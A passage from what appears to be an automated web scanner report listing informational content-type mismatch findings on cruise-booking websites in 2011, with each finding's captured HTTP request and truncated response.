Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://vacations.rooms.com/wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 05:44:36 GMT
ETag: "a-4ae5e78577900"
Accept-Ranges: bytes
ntCoent-Length: 10
Content-Type: application/x-javascript
Cache-Control: private
Content-Length: 10

<!-- -->
25.13. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vdassets.bitgravity.com
Path:   /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json?voxtoken=system&width=768&height=457&player_profile=ncl_default_hq&userAgent=Windows_Chrome&flash=10.3%20r183&silverlight=4&version=3.35 HTTP/1.1
Host: vdassets.bitgravity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:47:43 GMT
Server: VoxCAST
Cache-Control: max-age=3600
Content-Type: text/plain
Expires: Mon, 03 Oct 2011 13:47:41 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 02:28:50 GMT
Content-Length: 646
X-Cache: MISS from VoxCAST


document.write("<object type=\"application/x-shockwave-flash\" id=\"embedded_player_54834a058f00d\" name=\"embedded_player_54834a058f00d\" width=\"768\" height=\"457\" data=\"http://vdassets.bitgravi
...[SNIP]...
25.14. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-bd-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/booking/helveticaneueltstd-bd-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/booking/helveticaneueltstd-bd-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/booking/setGuestCountReservationStep1.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dbooking%2525253A%25252520getguestcountreservationstep1%2525253A%25252520departureinformation%252526pidt%25253D1%252526oid%25253DNext%25252520Step%2525250A%252526oidt%25253D3%252526ot%25253DSUBMIT%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Aug 2011 04:26:22 GMT
ETag: "60cb3-5690-26657780"
Accept-Ranges: bytes
Content-Length: 22160
Content-Type: text/plain
Cache-Control: max-age=7900
Expires: Mon, 03 Oct 2011 14:59:15 GMT
Date: Mon, 03 Oct 2011 12:47:35 GMT
Connection: close

wOFF......V.................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......S...`Z$r.cmap...X......."~.s*cvt .......:...:.F.Mfpgm...@.......e../.gasp............
...[SNIP]...
25.15. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-lt-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/booking/helveticaneueltstd-lt-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/booking/helveticaneueltstd-lt-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/booking/getGuestCountReservationStep1.do?cabincls=B&sailDate=1120513&br=C&packageCode=CN07A074&destCode=ALCAN&shipCode=CN&embarcationPortCode=YVR&returnQuery=isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse%23isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dsearch%2525253A%25252520vacationsearchresults%2525253A%25252520planandbook%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252F%25252523%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Aug 2011 04:26:22 GMT
ETag: "62acd-5ae0-26657780"
Accept-Ranges: bytes
Content-Length: 23264
Content-Type: text/plain
Cache-Control: max-age=16638
Expires: Mon, 03 Oct 2011 17:24:47 GMT
Date: Mon, 03 Oct 2011 12:47:29 GMT
Connection: close

wOFF......Z........\........................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......Q...`X.nKcmap...X......."~.s*cvt .......(...(...Ofpgm...,.......e../.gasp............
...[SNIP]...
25.16. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-roman-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/booking/helveticaneueltstd-roman-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/booking/helveticaneueltstd-roman-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/booking/setGuestCountReservationStep1.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dbooking%2525253A%25252520getguestcountreservationstep1%2525253A%25252520departureinformation%252526pidt%25253D1%252526oid%25253DNext%25252520Step%2525250A%252526oidt%25253D3%252526ot%25253DSUBMIT%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Aug 2011 04:26:22 GMT
ETag: "60cbb-5908-26657780"
Accept-Ranges: bytes
Content-Length: 22792
Content-Type: text/plain
Cache-Control: max-age=7918
Expires: Mon, 03 Oct 2011 14:59:33 GMT
Date: Mon, 03 Oct 2011 12:47:35 GMT
Connection: close

wOFF......Y.................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......S...`X.p.cmap...X......."~.s*cvt ...............6fpgm...4.......e../.gasp............
...[SNIP]...
25.17. http://www.celebritycruises.com/fonts/booking/helveticaneueltstd-th-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/booking/helveticaneueltstd-th-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/booking/helveticaneueltstd-th-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/booking/getGuestCountReservationStep1.do?cabincls=B&sailDate=1120513&br=C&packageCode=CN07A074&destCode=ALCAN&shipCode=CN&embarcationPortCode=YVR&returnQuery=isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse%23isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dsearch%2525253A%25252520vacationsearchresults%2525253A%25252520planandbook%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252F%25252523%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Aug 2011 04:26:22 GMT
ETag: "60cbf-5f6c-26657780"
Accept-Ranges: bytes
Content-Length: 24428
Content-Type: text/plain
Cache-Control: max-age=12681
Expires: Mon, 03 Oct 2011 16:18:50 GMT
Date: Mon, 03 Oct 2011 12:47:29 GMT
Connection: close

wOFF......_l................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......P...`X^n.cmap...T......."~.s*cvt ...............Kfpgm...........e../.gasp............
...[SNIP]...
25.18. http://www.celebritycruises.com/fonts/helveticaneueltstd-bd-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/helveticaneueltstd-bd-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/helveticaneueltstd-bd-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Jan 2011 18:59:05 GMT
ETag: "5833c-5690-bef55040"
Accept-Ranges: bytes
Content-Length: 22160
Content-Type: text/plain
Cache-Control: max-age=24686
Expires: Mon, 03 Oct 2011 19:38:29 GMT
Date: Mon, 03 Oct 2011 12:47:03 GMT
Connection: close

wOFF......V.................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......S...`Z$r.cmap...X......."~.s*cvt .......:...:.F.Mfpgm...@.......e../.gasp............
...[SNIP]...
25.19. http://www.celebritycruises.com/fonts/helveticaneueltstd-lt-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/helveticaneueltstd-lt-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/helveticaneueltstd-lt-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Jan 2011 18:59:05 GMT
ETag: "5721b-5ae0-bef55040"
Accept-Ranges: bytes
Content-Length: 23264
Content-Type: text/plain
Cache-Control: max-age=3137
Expires: Mon, 03 Oct 2011 13:39:20 GMT
Date: Mon, 03 Oct 2011 12:47:03 GMT
Connection: close

wOFF......Z........\........................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......Q...`X.nKcmap...X......."~.s*cvt .......(...(...Ofpgm...,.......e../.gasp............
...[SNIP]...
25.20. http://www.celebritycruises.com/fonts/helveticaneueltstd-roman-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/helveticaneueltstd-roman-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/helveticaneueltstd-roman-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Jan 2011 18:59:05 GMT
ETag: "58344-5908-bef55040"
Accept-Ranges: bytes
Content-Length: 22792
Content-Type: text/plain
Cache-Control: max-age=8110
Expires: Mon, 03 Oct 2011 15:02:13 GMT
Date: Mon, 03 Oct 2011 12:47:03 GMT
Connection: close

wOFF......Y.................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......S...`X.p.cmap...X......."~.s*cvt ...............6fpgm...4.......e../.gasp............
...[SNIP]...
25.21. http://www.celebritycruises.com/fonts/helveticaneueltstd-th-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /fonts/helveticaneueltstd-th-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/helveticaneueltstd-th-webfont.woff HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Jan 2011 18:59:05 GMT
ETag: "58348-5f6c-bef55040"
Accept-Ranges: bytes
Content-Length: 24428
Content-Type: text/plain
Cache-Control: max-age=3085
Expires: Mon, 03 Oct 2011 13:38:28 GMT
Date: Mon, 03 Oct 2011 12:47:03 GMT
Connection: close

wOFF......_l................................BASE.......>...P.%.1FFTM............X..GDEF.......(...,....OS/2.......P...`X^n.cmap...T......."~.s*cvt ...............Kfpgm...........e../.gasp............
...[SNIP]...
25.22. http://www.celebritycruises.com/search/loadSearchJSON.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebritycruises.com
Path:   /search/loadSearchJSON.do

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /search/loadSearchJSON.do?_=1317646063075&isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded= HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en
Date: Mon, 03 Oct 2011 12:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33109


{"totalPackages":287,"query":{"dest":"ANY","monthStart":"ANY","monthEnd":"ANY","port":"ANY","duration":"ANY","ship":"ANY","includeAdjascentPorts":"Y","promoid":"","promoType":"","promotionTypeI
...[SNIP]...
25.23. http://www.cruises.com/code/webdata/webdataregister.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /code/webdata/webdataregister.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /code/webdata/webdataregister.asp?webdataID=1501 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 32
Content-Type: text/html
Cache-control: private
Content-Length: 32

function DummyBrowserCheck() {};
25.24. http://www.cruises.com/idle.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /idle.do

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /idle.do?msg=2 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:03 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:03 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:03 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: sid=6383; Path=/
ntCoent-Length: 45
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:03 GMT;path=/
Cache-Control: private
Content-Length: 45


<!--
   This is an idle action ! />
-->
25.25. http://www.cruises.com/images_unique/cs/CS_CHATbanner_w.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cruises.com
Path:   /images_unique/cs/CS_CHATbanner_w.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images_unique/cs/CS_CHATbanner_w.jpg HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 6176
Content-Type: image/jpeg
Last-Modified: Thu, 10 Feb 2011 21:56:07 GMT
Accept-Ranges: bytes
ETag: "789e41526dc9cb1:6ab4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:11 GMT

GIF89a..|.....u....C..{..@..>..,..*..3..7..9..F..;..B..0..D../..5..=..J..    u..y.!...z.......$...{........~.%...w..}..|.
v.(...x.....w.....~.9..k..)....................Z..2..6..4...w..x.0.....,.. z.*...
...[SNIP]...
25.26. http://www.cruises.com/images_unique/cs/CS_FAQbanner_w.jpg  previous  next

Summary

